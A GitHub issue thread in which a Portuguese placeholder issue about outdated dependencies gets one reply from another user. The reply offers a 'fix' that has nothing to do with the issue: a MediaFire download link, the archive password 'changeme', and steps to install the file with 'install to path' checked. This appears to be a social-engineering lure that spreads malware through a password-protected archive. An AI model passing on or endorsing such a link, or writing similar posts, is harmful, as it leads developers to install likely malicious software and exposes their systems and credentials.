### ISSUE TITLE
[Débito Técnico]: teste

### ISSUE THREAD

**Issue by guifdsk** [guifdsk/estudo-repositorio-github#92]
### Tipo de Débito Técnico

Dependências Desatualizadas

### Pontuação

4

### Link do Repositório

teste.com

### Notas Adicionais

TEste

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
